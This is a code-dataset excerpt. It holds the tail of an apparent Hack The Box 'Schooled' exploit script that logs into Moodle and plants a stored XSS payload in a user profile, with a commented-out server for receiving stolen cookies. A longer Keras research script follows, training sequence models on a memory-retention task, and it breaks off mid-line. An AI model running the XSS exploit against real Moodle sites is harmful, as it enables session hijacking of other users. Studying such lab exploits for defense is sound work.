\"&city=&country=PT&timezone=99&description_editor%5Btext%5D=&description_editor%5Bformat%5D=1&description_editor%5Bitemid%5D=253209954&imagefile=777744395&imagealt=&firstnamephonetic=&lastnamephonetic=&middlename=&alternatename=&interests=_qf__force_multiselect_submission&url=&icq=&skype=&aim=&yahoo=&msn=&idnumber=&institution=&department=&phone1=&phone2=&address=&submitbutton=Update+profile\"\n \n print(payload)\n \n r = s.post(url, data=data, headers=headers, allow_redirects=True) # proxies=proxies\n #print(r.text)\n \n if \"MoodleNet profile\" in r.text:\n print(\"[SUCCESS] We have successfully dropped our XSS payload into the moodlenetprofile area!\")\n else:\n print(\"[ERROR] Something went wrong, we did not manage to drop our XSS payload!\")\n \n\n\n\"\"\"\ndef create_server():\n # HTTP Server receiving our stolen cookies \n handler = http.server.SimpleHTTPRequestHandler\n httpd = socketserver.TCPServer((args.IP, int(args.webport)), handler)\n print(\"Serving our PHP payload here: http://%s:%s\" % (args.IP, args.webport))\n httpd.serve_forever()\n\nthreading.Thread(target=create_server).start()\n\"\"\"\n\ndef main():\n if args.target == \"moodle.schooled.htb\":\n #register(args.target, args.username, args.password)\n sesskey = login(args.target, args.username, args.password)\n enroll_maffs(args.target, sesskey)\n exploit_xss(args.target, args.username, sesskey, args.IP, args.port)\n\n else:\n print(\"[ERROR] Please use the subdomain moodle.schooled.htb as the target\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"brutuspt/0click_HTB","sub_path":"Medium/Schooled/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"68"} +{"seq_id":"13674732446","text":"# https://keras.io/examples/nlp/lstm_seq2seq/\n\nimport numpy as np\nimport argparse\nimport tensorflow as tf\nfrom tensorflow import keras\n# from tensorflow.keras.callbacks import EarlyStopping\nfrom dataset.synthetic_dataset_encoder_mlp import *\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import balanced_accuracy_score, recall_score\nfrom sklearn.metrics import classification_report\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Conv1D\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import MaxPooling1D\nfrom tensorflow.keras.layers import BatchNormalization, Dropout, Activation\n# from keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras import layers\nimport pandas as pd\nimport pickle\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import Callback\n\ndef warn(*args, **kwargs):\n pass\nimport warnings\nwarnings.warn = warn\n\n\n# transformer block implementations\nclass TransformerBlock(layers.Layer):\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\n super(TransformerBlock, self).__init__()\n self.att = layers.MultiHeadAttention(num_heads=num_heads,\n key_dim=embed_dim)\n self.ffn = keras.Sequential(\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim), ]\n )\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\n self.dropout1 = layers.Dropout(rate)\n self.dropout2 = layers.Dropout(rate)\n\n def call(self, inputs, training):\n attn_output = self.att(inputs, inputs)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(inputs + attn_output)\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output, training=training)\n return self.layernorm2(out1 + ffn_output)\n\n\nclass TokenAndPositionEmbedding(layers.Layer):\n def __init__(self, maxlen, vocab_size, embed_dim, memory_model):\n super(TokenAndPositionEmbedding, self).__init__()\n self.memory_model = memory_model\n if (self.memory_model != \"transformer_no_orthonormal\"):\n self.maxlen = maxlen\n # add encoding only when orthonormal encoding is not used\n if (self.memory_model == \"transformer_no_orthonormal\"):\n self.token_emb = layers.Embedding(input_dim=vocab_size,\n output_dim=embed_dim)\n self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)\n\n def call(self, x):\n if (self.memory_model == \"transformer_no_orthonormal\"):\n maxlen = tf.shape(x)[-1]\n if (self.memory_model != \"transformer_no_orthonormal\"):\n positions = tf.range(start=0, limit=self.maxlen, delta=1)\n else:\n positions = tf.range(start=0, limit=maxlen, delta=1)\n positions = self.pos_emb(positions)\n if (self.memory_model == \"transformer_no_orthonormal\"):\n x = self.token_emb(x)\n return x + positions\n\n\ndef load_dataset(args):\n # df = pd.read_csv('/workspace/memory_clean/Memory/memory_retention_raw.csv',\n # usecols=['index', 'seq_len', 'seq', 'rep_token_first_pos',\n # 'query_token', 'target_val'])\n if args.debug == 1:\n df = pd.read_csv(args.root_location + \"memory_retention_raw_26.csv\",\n usecols=['index', 'seq_len', 'seq',\n 'rep_token_first_pos',\n 'query_token', 'target_val'])\n else:\n df = pd.read_csv(args.root_location + \"memory_retention_raw.csv\",\n usecols=['index', 'seq_len', 'seq',\n 'rep_token_first_pos',\n 'query_token', 'target_val'])\n print(df.head())\n len_seq = df['seq_len'].to_numpy()\n raw_sequence = df['seq'].to_numpy()\n rep_token_first_pos = df['rep_token_first_pos'].to_numpy()\n token_rep = df['query_token'].to_numpy()\n target_y = df['target_val'].to_numpy()\n\n # read the pickle file\n if args.debug == 1:\n f = open(args.root_location + 'input_data_26.pkl', 'rb')\n orth_vectors = np.load(\n args.root_location + 'orthonormal_vectors_26.npy')\n else:\n f = open(args.root_location + 'input_data.pkl', 'rb')\n orth_vectors = np.load(\n args.root_location + 'orthonormal_vectors_512.npy')\n x = pickle.load(f)\n f.close()\n ip_sequence = np.load(args.root_location + 'raw_sequence.npy',\n allow_pickle=True)\n num_samples = len(x)\n raw_sample_length = len(raw_sequence)\n print(\"Number of samples {}\".format(num_samples))\n print(\"Number of samples in raw sequence {}\".format(raw_sample_length))\n return x, num_samples, len_seq, token_rep, rep_token_first_pos, \\\n ip_sequence, target_y, orth_vectors\n\n\n\"\"\"\nget the token id from the from the sequence, required for transformers\n\"\"\"\n\n\ndef orthonormal_decode(dataset, orthonormal_vectors):\n seq_dataset = []\n for sequence in dataset:\n seq = []\n for token in sequence:\n a = np.matmul(token, orthonormal_vectors.T)\n idx = np.isclose(a, 1)\n id = np.where(idx == True)\n if np.size(id) == 0:\n token_id = 0\n else:\n token_id = id[0][0]\n # do not append eos\n if (token_id == 511):\n break\n seq.append(token_id)\n seq_dataset.append(seq)\n\n return seq_dataset\n\n\n\"\"\"\nThis function parses and pads the data\n\"\"\"\n\n\ndef process_data(max_seq_len, latent_dim, padding, memory_model, num_samples, x,\n raw_sequence):\n # separate out the input to the encoder and the mlp\n # mlp is fed the last one hot encoded input\n x_mlp = [0] * num_samples\n x_encoder = [0] * num_samples\n\n for iter, seq in enumerate(x):\n # seq[-1] - eos seq[-2] - query token seq[0:-2] - seq\n x_mlp[iter] = seq[-2]\n # all but the last one hot encoded sequence\n x_encoder[iter] = seq[0:-2]\n # eos\n x_encoder[iter].append(seq[-1])\n\n # seq len + 1 for alphabet + eos as orthonormal vectors are created with eos\n # max size of seq len is not max seq len - 1 for the actual sequence + 1 for eos\n encoder_input_data = np.zeros((num_samples, max_seq_len,\n latent_dim * 2), dtype=\"float32\")\n\n mlp_input_data = np.zeros((num_samples, latent_dim * 2), dtype=\"float32\")\n\n if padding == 'pre_padding':\n print(\"The shape of the encoder data is: \" + str(\n encoder_input_data.shape))\n for i in range(num_samples):\n seq_len = len(x_encoder[i])\n\n for seq in range(seq_len):\n # fill the elements in encoder_input_data in the reverse order,\n # this ensures that zero padding is done before the sequence\n encoder_input_data[i, max_seq_len - seq_len + seq] = \\\n x_encoder[i][seq]\n mlp_input_data[i] = x_mlp[i]\n elif padding == 'post_padding':\n\n for i in range(num_samples):\n seq_len = len(x_encoder[i])\n for seq in range(seq_len):\n encoder_input_data[i, seq] = x_encoder[i][seq]\n mlp_input_data[i] = x_mlp[i]\n\n if memory_model == \"transformer_no_orthonormal\":\n # remove the query token - the last token in raw_sequence\n sequence_raw = []\n for seq in raw_sequence:\n sequence_raw.append(seq[:-1])\n raw_sequence_padded = keras.preprocessing.sequence.pad_sequences(\n sequence_raw, maxlen=max_seq_len - 1, value=0)\n else:\n raw_sequence_padded = raw_sequence\n\n return encoder_input_data, mlp_input_data, raw_sequence_padded\n\n\ndef define_nn_model(max_seq_len, memory_model, latent_dim, raw_seq_train,\n raw_seq_val):\n # Define an input sequence and process it.\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n\n if memory_model == \"lstm\":\n # Define an input sequence and process it.\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n\n \"\"\"\n # encoder = Sequential()\n dense_layer = Sequential()\n encoder = keras.layers.LSTM(128, return_state=True)\n # encoder.add(keras.layers.Dense(512))\n encoder_outputs, state_h, state_c = encoder(main_sequence)\n # state_h, state_c = encoder(main_sequence)\n # We discard `encoder_outputs` and only keep the states.\n encoder_states = tf.concat((state_h, state_c), 1)\n dense_layer.add(keras.layers.Dense(768))\n dense_layer.add(keras.layers.Dense(512))\n encoder_states = dense_layer(encoder_states)\n \"\"\"\n encoder_outputs, state_h, state_c = keras.layers.LSTM(240, return_state=True)(main_sequence)\n encoder_states = tf.concat((state_h, state_c), 1)\n #encoder_states = keras.layers.Dense(768)(encoder_states)\n encoder_states = keras.layers.Dense(512)(encoder_states)\n\n\n lr = 0.0013378606854350151\n print(\"Encoder chosen is LSTM\")\n elif memory_model == \"RNN\":\n # Define an input sequence and process it.\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n \"\"\"\n encoder = Sequential()\n encoder.add(keras.layers.SimpleRNN(256))\n encoder.add(keras.layers.Dense(1024, activation='relu'))\n encoder.add(keras.layers.Dense(512))\n encoder_output = encoder(main_sequence)\n encoder_states = encoder_output\n encoder.summary()\n \"\"\"\n encoder_states = keras.layers.SimpleRNN(584)(main_sequence)\n #encoder_states = keras.layers.BatchNormalization()(encoder_states)\n #encoder_states = keras.layers.Dropout(0.2)(encoder_states)\n #encoder_states = keras.layers.Dense(1024, activation='relu')(encoder_states)\n #encoder_states = keras.layers.BatchNormalization()(encoder_states)\n #encoder_states = keras.layers.Dropout(0.2)(encoder_states)\n encoder_states = keras.layers.Dense(512)(encoder_states)\n\n print(\"Encoder chosen is simple RNN\")\n print(\"Shape of the encoder output is: \" + str(encoder_states))\n lr = 1.0465692011515144e-05\n elif memory_model == \"CNN\":\n input_shape = (max_seq_len, latent_dim * 2)\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n \"\"\"\n encoder = Sequential()\n # there are 256 different channels and each channel 7 tokens are taken at once, and convolution is performed\n # dimesion of input is max_seq_len(100)*latent_dim*2(512) so after convolution the output size is max_seq_len because padding is same\n # then padding must be such that the max value of 50 outputs are taken, so each filter has 2 outputs for max seq size = 100\n # so total outputs = latent_dim(256)*2 = 512; since output is concatenated with token make sure that the dimensions are same\n encoder.add(\n keras.layers.Conv1D(filters=128, kernel_size=3, padding='same',\n activation='relu', input_shape=input_shape))\n encoder.add(\n keras.layers.Conv1D(filters=256, kernel_size=3, padding='same',\n strides=2, activation='relu'))\n encoder.add(\n keras.layers.Conv1D(filters=512, kernel_size=3, padding='same',\n strides=2, activation='relu'))\n\n # encoder.add(keras.layers.Dropout(0.3))\n encoder.add(keras.layers.GlobalMaxPooling1D())\n encoder.add(keras.layers.Dropout(0.3))\n # flatten makes the shape as [None, None]\n # encoder.add(Flatten())\n # encoder.add(keras.layers.Reshape((latent_dim*2,)))\n # encoder.add(Flatten())\n encoder.add(keras.layers.Dense(latent_dim * 2))\n\n encoder.summary()\n encoder_output = encoder(main_sequence)\n encoder_states = encoder_output\n \"\"\"\n # kernel size=1 because in this problem there is no relation between\n # any 2 tokens.\n # kernel size = 1 activation = tanh; pooling try others\n encoder_states = keras.layers.Conv1D(filters=128, kernel_size=3, padding='same',\n activation='relu', input_shape=input_shape)(main_sequence)\n encoder_states = keras.layers.Conv1D(filters=256, kernel_size=3, padding='same',\n strides=2, activation='relu')(encoder_states)\n encoder_states = keras.layers.Conv1D(filters=512, kernel_size=3, padding='same',\n strides=2, activation='relu')(encoder_states)\n encoder_states = keras.layers.GlobalMaxPooling1D()(encoder_states)\n #encoder_states = keras.layers.BatchNormalization()(encoder_states)\n encoder_states = keras.layers.Dropout(0.3)(encoder_states)\n encoder_states = keras.layers.Dense(latent_dim * 2)(encoder_states)\n\n print(\"Encoder chosen is CNN\")\n print(\"Shape of the encoder output is: \" + str(encoder_states))\n # lr = 0.00012691763008376296\n lr = 7.201800744529144e-05\n elif memory_model == \"transformer\":\n\n embed_dim = 32 # Embedding size for each token\n num_heads = 10 # Number of attention heads\n ff_dim = 8 # Hidden layer size in feed forward network inside transformer\n maxlen = max_seq_len\n vocab_size = max_seq_len\n main_sequence = keras.Input(shape=(None, latent_dim * 2))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n # inputs = layers.Input(shape=(maxlen,))\n embedding_layer = TokenAndPositionEmbedding(maxlen, vocab_size,\n embed_dim, memory_model)\n x = embedding_layer(main_sequence)\n transformer_block = TransformerBlock(embed_dim, num_heads, ff_dim)\n x = transformer_block(x)\n x = layers.GlobalAveragePooling1D()(x)\n x = layers.Dropout(0.1)(x)\n x = layers.Dense(20, activation=\"relu\")(x)\n x = layers.Dropout(0.1)(x)\n encoder_output = layers.Dense(latent_dim * 2)(x)\n encoder_states = encoder_output\n print(\"Shape of the encoder output is: \" + str(encoder_states))\n elif memory_model == \"transformer_no_orthonormal\":\n embed_dim = 32 # Embedding size for each token\n num_heads = 10 # Number of attention heads\n ff_dim = 32 # Hidden layer size in feed forward network inside transformer\n maxlen = max_seq_len\n vocab_size = maxlen\n main_sequence = layers.Input(shape=(maxlen - 1,))\n query_input_node = keras.Input(shape=(latent_dim * 2))\n\n # max length is 99 - do not restrict number of tokens; doesnt include eos\n # vocab_size is also 100 as there are 100 unique tokens\n embedding_layer = TokenAndPositionEmbedding(maxlen - 1, vocab_size,\n embed_dim, memory_model)\n x = embedding_layer(main_sequence)\n transformer_block = TransformerBlock(embed_dim, num_heads, ff_dim)\n x = transformer_block(x)\n x = layers.GlobalAveragePooling1D()(x)\n x = layers.Dropout(0.1)(x)\n outputs = layers.Dense(latent_dim * 2)(x)\n encoder_states = outputs\n\n # encoder_input_data_train/test must now be decoded to have a list of token_ids\n # encoder_input_data_train = np.array(orthonormal_decode(encoder_input_data_train, orthonormal_vectors))\n # encoder_input_data_test = np.array(orthonormal_decode(encoder_input_data_test, orthonormal_vectors))\n encoder_input_train = raw_seq_train\n encoder_input_val = raw_seq_val\n\n # query_encoder = Sequential()\n # query_ip_shape = query_train.shape[1]\n # query_encoder.add(Dense(latent_dim*2, input_shape=(query_ip_shape,), activation='relu'))\n # query_encoded_op = query_encoder(query_input_node)\n\n num_classes = 2\n input_shape = encoder_states.shape[1]\n\n concatenated_output = tf.reshape(\n tf.reduce_sum(encoder_states * query_input_node, axis=1), (-1, 1))\n\n concatenated_output_shape = 1 # (latent_dim*4)+1\n print(\"The concatenated input shape is: \" + str(concatenated_output_shape))\n\n\n \"\"\"\n y = keras.layers.Concatenate(axis=1)([encoder_states, query_input_node])\n y = keras.layers.BatchNormalization()(y)\n y = keras.layers.Dropout(0.2)(y)\n y = keras.layers.Dense(768, activation=keras.activations.relu)(y)\n y = keras.layers.BatchNormalization()(y)\n y = keras.layers.Dropout(0.2)(y)\n y = keras.layers.Dense(512, activation=keras.activations.relu)(y)\n y = keras.layers.BatchNormalization()(y)\n y = keras.layers.Dropout(0.2)(y)\n similarity_output = keras.layers.Dense(1, activation='sigmoid')(y)\n #similarity_output = keras.layers.Dense(1)(y)\n \"\"\"\n\n #similarity_output = tf.reshape(\n # tf.reduce_sum(encoder_states * query_input_node, axis=1), (-1, 1))\n # construct another model to learn the similarities between the encoded\n # input and the query vector\n # Define the model that will turn\n # `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\n #model = keras.Model([main_sequence, query_input_node], similarity_output)\n model = keras.Model([main_sequence, query_input_node], concatenated_output)\n model.summary()\n\n\n model.compile(\n #optimizer=RMSprop(learning_rate=1e-3),\n optimizer=RMSprop(learning_rate=lr),\n #optimizer=Adam(learning_rate=1e-3),\n loss=keras.losses.BinaryCrossentropy(from_logits=True),\n #loss=keras.losses.BinaryCrossentropy(from_logits=False),\n\n metrics=[\"accuracy\"]\n )\n\n return model\n\n\nclass TestCallback(Callback):\n def __init__(self, test_data):\n self.test_data = test_data\n self.test_acc = []\n self.test_loss = []\n\n def on_epoch_end(self, epoch, logs={}):\n x, y = self.test_data\n loss, acc = self.model.evaluate(x, y, verbose=0)\n self.test_acc.append(acc)\n self.test_loss.append(loss)\n print('\\nTesting loss: {}, acc: {}\\n'.format(loss, acc))\n\n\ndef train_model(batch_size, epochs, memory_model, model,\n encoder_input_train, encoder_input_val, query_input_train,\n query_input_val, target_train, target_val, checkpoint_filepath):\n model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n monitor=\"val_accuracy\",\n mode=\"max\",\n verbose=1,\n save_best_only=True\n )\n\n def scheduler(epoch, lr):\n if epoch < 10:\n return lr\n else:\n return lr * 0.9\n\n callback = tf.keras.callbacks.LearningRateScheduler(scheduler)\n\n # test train split on the train dataset\n\n history = model.fit(\n [encoder_input_train, query_input_train],\n target_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=([encoder_input_val, query_input_val], target_val),\n callbacks=[model_checkpoint_callback],\n #callbacks=[model_checkpoint_callback, callback] # ,\n # TestCallback((encoder_input_val, query_input_val))]\n )\n\n print(\"Number of epochs run: \" + str(len(history.history[\"loss\"])))\n\n # save the validation and test accuracy and loss for further plotting\n # np.save('test_accuracy_' + str(memory_model), np.array(test_acc))\n # np.save('test_loss_' + str(memory_model), np.array(test_loss))\n np.save('val_accuracy_' + str(memory_model),\n np.array(history.history[\"val_accuracy\"]))\n np.save('val_loss_' + str(memory_model),\n np.array(history.history[\"val_loss\"]))\n\n return\n\n\ndef predict_model(model, target_val, encoder_input_val,\n query_input_val):\n\n y_test = model.predict([encoder_input_val, query_input_val])\n y_test = sigmoid(y_test)\n # y_pred = np.argmax(y_test, axis=1)\n # for the kernel functions you would need values which are not 0 or 1\n y_pred_binary = np.array([1 if y > 0.5 else 0 for y in y_test])\n y_pred_continuous = y_test\n return y_pred_binary, y_pred_continuous\n\n\ndef compute_save_metrics(max_seq_len, memory_model, y_true, y_pred,\n sequence_length_val,\n rep_token_pos_val):\n # total balanced accuracy accross the entire test dataset\n y_pred = sigmoid(y_pred)\n y_pred = np.array([1 if y > 0.5 else 0 for y in y_pred])\n balanced_accuracy = balanced_accuracy_score(y_true, y_pred)\n\n # Find the balanced accuracy accross different sequence length\n sequence_len_arr = np.array(sequence_length_val)\n # balanced_acc_seq_len of 0 and 1 are meaningless\n balanced_acc_seq_len = np.zeros(\n shape=(max_seq_len, max_seq_len)) # [0]*(max_seq_len+1)\n\n dist_arr = []\n rep_first_token_test = np.array(rep_token_pos_val)\n # dist_test == max_seq_len means there were no repeats,\n # should be fine as we ignore entries with max len later on\n rep_token_test = np.where(rep_first_token_test == -1, max_seq_len,\n rep_first_token_test)\n dist_test = np.subtract(sequence_len_arr, np.add(rep_token_test, 1))\n\n for seq_len in range(1, max_seq_len):\n # balanced_acc_seq_len.append([])\n for dist in range(0, seq_len):\n\n # get the indices of samples which have a particular sequence length\n seq_len_indices = np.where(\n (sequence_len_arr == seq_len) & (dist_test == dist))\n\n # splice y_true and y_pred based on the seq length\n y_true_seq_len = np.take(y_true, seq_len_indices[0])\n y_pred_seq_len = np.take(y_pred, seq_len_indices[0])\n\n #print(\"The number of sequences are: \" + str(len(y_true_seq_len)))\n if len(y_true_seq_len) > 0:\n balanced_acc_seq_len[seq_len][dist] = balanced_accuracy_score(\n y_true_seq_len, y_pred_seq_len)\n\n #print(\n # \"Balanced accuracy for seq len {} and dist {} is {}\".format(\n # seq_len,\n # dist,\n # balanced_acc_seq_len[\n # seq_len][\n # dist]))\n\n # save the balanced accuracy per seq len\n f = open('balanced_acc_seq_len_dist_' + memory_model + '.pkl', 'wb')\n pickle.dump(balanced_acc_seq_len, f, -1)\n f.close()\n\n return dist_test, balanced_accuracy\n\n\ndef sigmoid(x):\n z = np.exp(-1.0 * x)\n sig = 1.0 / (1.0 + z)\n return sig\n\n\ndef compute_optimal_tau(kern, avg_test_acc, y_true, y_pred, dist_test,\n sequence_length_val):\n # difficulty = seq len; time elapsed since last review = dist; strength =\n # average accuracy.\n # normalize s and d by dividing by 100\n x = [((s * d * 1.0) / ((avg_test_acc+np.finfo(float).eps) * 100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n #test_accs = np.array(y_true.ravel()) & np.array(y_pred.ravel())\n #print(test_accs.shape)\n #test_accs = [0.1 if acc < 1. else 0.9 for acc in\n # test_accs.squeeze().tolist()]\n # test accs now are continuous non-zero values\n\n test_accs = np.array(y_pred.ravel())\n test_accs = [0.001 if test_acc == 0 else test_acc for test_acc in test_accs]\n\n\n if kern == 'Gaussian':\n # throughout training - take average error\n # earlyon maybe a different model is better and maybe at the end a diff\n # model is good - good to capture\n # do this on the validation data\n\n # epochs1 - k use validation acc as strength of model\n # at teh end use test acc as strength of model\n # s and d normalize - s - 1 - 100 -> 0.01 - 1 d - 0.01 - 1\n # use validation acc instead of test acc - best validation acc\n # best epoch try all functions - both papers on val data\n # then do this for every epoch - val data\n # dont use test data to tune hyperparams\n # gaussian\n num = -1.0 * np.sum(np.log(test_accs))\n den = np.sum(np.power(x, 2))\n\n if kern == \"Laplacian\":\n num = -1.0 * np.sum(np.log(test_accs))\n den = np.sum(x)\n\n if kern == \"Linear\":\n num = np.sum(np.sum(np.subtract(1, test_accs)))\n den = np.sum(x)\n\n if kern == \"Cosine\":\n num = np.sum(np.arccos(np.subtract(np.multiply(2., test_accs), 1)))\n den = np.pi * np.sum(x)\n\n if kern == \"Quadratic\":\n num = np.sum(np.subtract(1.0, test_accs))\n den = np.sum(np.power(x, 2))\n\n if kern == \"Secant\":\n # num = np.sum(np.log(1. / np.sum(test_accs) + np.sqrt(\n # 1. / np.sum(np.subtract(np.power(test_accs, 2), 1.)))))\n num = np.sum(np.log(1. / np.sum(test_accs) + np.sqrt(\n np.subtract(np.sum((1. / np.power(test_accs, 2))), 1.))))\n den = np.sum(np.power(x, 2))\n\n tau = num * 1.0 / den\n return tau, test_accs\n\n\ndef compute_l2_loss(tau, kern, test_accs):\n if kern == 'Gaussian':\n print(\"computing l2 loss\")\n f_gauss = np.exp(-1 * tau * np.sum(np.power(x, 2)))\n # test_acc b/w 0 and 1\n f_gauss_loss = np.mean(np.power((f_gauss - test_accs), 2))\n return f_gauss_loss\n\n if kern == \"Laplacian\":\n f_lap = np.exp(-1 * tau * np.sum(x))\n # test_acc b/w 0 and 1\n f_lap_loss = np.mean(np.power((f_lap - test_accs), 2))\n return f_lap_loss\n\n if kern == \"Linear\":\n f_lin = (1 - (1 * tau * np.sum(x)))\n f_lin_loss = np.mean(np.power((f_lin - test_accs), 2))\n return f_lin_loss\n\n if kern == \"Cosine\":\n f_cos = 1 / 2 * np.cos(tau * np.sum(x) * np.pi)\n f_cos_loss = np.mean(np.power((f_cos - test_accs), 2))\n return f_cos_loss\n\n if kern == \"Quadratic\":\n f_qua = 1 - tau * np.sum(np.power(x, 2))\n f_qua_loss = np.mean(np.power((f_qua - test_accs), 2))\n return f_qua_loss\n\n if kern == \"Secant\":\n f_sec = 2 * 1.0 / (np.exp(-1 * tau * np.sum(np.power(x, 2))) + np.exp(\n 1 * tau * np.sum(np.power(x, 2))))\n f_sec_loss = np.mean(np.power((f_sec - test_accs), 2))\n return f_sec_loss\n\n\ndef compute_loss_forgetting_functions(forgetting_function, avg_test_acc,\n dist_test, sequence_length_val, test_accs):\n\n # difficulty = seq len; time elapsed since last review = dist; strength =\n # average accuracy.\n # exp(-seq_len*intervening_tokens/avg_test_acc)\n\n if forgetting_function == 'diff_dist_strength':\n x = [((s * d * 1.0) / ((avg_test_acc+np.finfo(float).eps) * 100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n x = np.array(x)\n f_diff_dist_strength = np.exp(-x)\n f_diff_dist_strength_loss = np.mean(np.power\n ((f_diff_dist_strength - test_accs), 2))\n return f_diff_dist_strength_loss\n\n # exp(-seq_len*intervening_tokens)\n elif forgetting_function == 'diff_dist':\n x = [((s * d * 1.0) / (100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n x = np.array(x)\n f_diff_dist = np.exp(-x)\n f_diff_dist_loss = np.mean(np.power\n ((f_diff_dist - test_accs), 2))\n return f_diff_dist_loss\n\n # exp(-seq_len/avg_test_acc)\n elif forgetting_function == 'diff_strength':\n x = [((s * 1.0) / ((avg_test_acc+np.finfo(float).eps) * 100 * 100)) for s, d in\n zip(sequence_length_val, dist_test)]\n x = np.array(x)\n f_diff_strength = np.exp(-x)\n f_diff_strength_loss = np.mean(np.power\n ((f_diff_strength - test_accs), 2))\n return f_diff_strength_loss\n\ndef kernel_matching(y_true, y_pred, dist_test, sequence_length_val,\n y_pred_binary_pos_samples):\n kernels = ['Gaussian', 'Laplacian', 'Linear', 'Cosine', 'Quadratic',\n 'Secant']\n\n avg_test_acc = balanced_accuracy_score(y_true, y_pred_binary_pos_samples)\n print(\"computing optimal tau\")\n kern_loss = []\n tau_kernels = []\n exp_forgetting_function_loss = []\n # compute x - seq_len*dist\n\n for kern in kernels:\n print(\"Kernel type is {}\".format(kern))\n\n tau, test_accs = compute_optimal_tau(kern, avg_test_acc, y_true, y_pred,\n dist_test, sequence_length_val)\n tau_kernels.append(tau)\n print(\"optimal value of tau is {}\".format(tau))\n l2_loss = compute_l2_loss(tau, kern, test_accs)\n print(\"L2 loss for kernel {} is {}\".format(kern, l2_loss))\n kern_loss.append(l2_loss)\n\n # compute l2 loss for functions from Reddy et al paper\n exp_forgetting_functions = ['diff_dist_strength', 'diff_dist',\n 'diff_strength']\n\n #test_accs = np.array(y_true.ravel()) & np.array(y_pred.ravel())\n test_accs = np.array(y_pred.ravel())\n for exp_forgetting_function in exp_forgetting_functions:\n exp_forgetting_l2_loss = compute_loss_forgetting_functions(\n exp_forgetting_function, avg_test_acc, dist_test, sequence_length_val,\n test_accs)\n exp_forgetting_function_loss.append(exp_forgetting_l2_loss)\n print(\"L2 loss for forgetting function {} is {}\".format(exp_forgetting_function, exp_forgetting_l2_loss))\n\n\n # find the least loss\n min_index = kern_loss.index(min(kern_loss))\n print(\"The best kernel is {}\".format(kernels[min_index]))\n print(\"the value of the loss is {}\".format(min(kern_loss)))\n\n min_index_exp_forgetting_function = \\\n exp_forgetting_function_loss.index(min(exp_forgetting_function_loss))\n print(\"The best forgetting function is {}\".format(exp_forgetting_functions[min_index_exp_forgetting_function]))\n\n print(\"the value of the loss is {}\".format(min(exp_forgetting_function_loss)))\n return kernels[min_index], tau_kernels[min_index]\n\n\ndef main(args):\n if args.debug == 1:\n args.root_location = \\\n '/Users/sherin/Documents/research/server_version_memory/Memory/'\n\n else:\n #args.root_location = '/workspace/memory_clean/Memory/'\n args.root_location = '/data/memory/'\n print(\"Loading the dataset\")\n x, num_samples, sequence_len, token_repeated, rep_token_first_pos, \\\n raw_sequence, target_y, orth_vectors = load_dataset(args)\n\n print(\"processing the dataset\")\n encoder_input_data, query_data, raw_sequence_padded = \\\n process_data(args.max_seq_len, args.latent_dim, args.padding,\n args.nn_model, num_samples,\n x, raw_sequence)\n\n print(\"Creating train and test split\")\n\n # train test split\n (encoder_input_data_train, encoder_input_data_test,\n query_train, query_test,\n target_y_train, target_y_test,\n sequence_len_train, sequence_len_test,\n token_repeated_train, token_repeated_test,\n rep_token_first_pos_train, rep_token_first_pos_test,\n raw_sequence_train, raw_sequence_test) = train_test_split(\n encoder_input_data,\n query_data,\n target_y,\n sequence_len,\n token_repeated,\n rep_token_first_pos,\n raw_sequence_padded,\n random_state=2,\n test_size=0.3)\n\n # train val split\n (encoder_input_train, encoder_input_val,\n query_input_train, query_input_val,\n target_train, target_val,\n sequence_length_train, sequence_length_val,\n token_rep_train, token_rep_val,\n rep_token_pos_train, rep_token_pos_val,\n raw_seq_train, raw_seq_val) = train_test_split(\n encoder_input_data_train,\n query_train,\n target_y_train,\n sequence_len_train,\n token_repeated_train,\n rep_token_first_pos_train,\n raw_sequence_train,\n random_state=2,\n test_size=0.3)\n\n print(\"The number of examples in the training data set is \" + str(\n len(encoder_input_train)))\n print(\"The number of example in the test data set is \" + str(\n len(encoder_input_data_test)))\n print(\"The number of example in the validation data set is \" + str(\n len(encoder_input_val)))\n\n # define the neural network model\n print(\"defining the Neural Network\")\n model = define_nn_model(args.max_seq_len, args.nn_model, args.latent_dim,\n raw_seq_train,\n raw_seq_val)\n\n # train and save the best model\n # adding params like epoch and val accuracy will save all the models\n checkpoint_filepath = 'best_model_' + str(args.nn_model)\n\n print(\"training the neural network\")\n train_model(args.batch_size, args.epochs, args.nn_model, model,\n encoder_input_train, encoder_input_val, query_input_train,\n query_input_val, target_train, target_val, checkpoint_filepath)\n\n # load the best model after training is complete\n print(\"loading the best model\")\n model = keras.models.load_model(checkpoint_filepath)\n\n # test the model on novel data\n print(\"predicting on novel inputs\")\n y_pred_binary, y_pred_continuous = predict_model(model, target_val,\n encoder_input_val, query_input_val)\n\n # compute accuracy based on seq len and number of intervening tokens\n dist_test, balanced_accuracy = 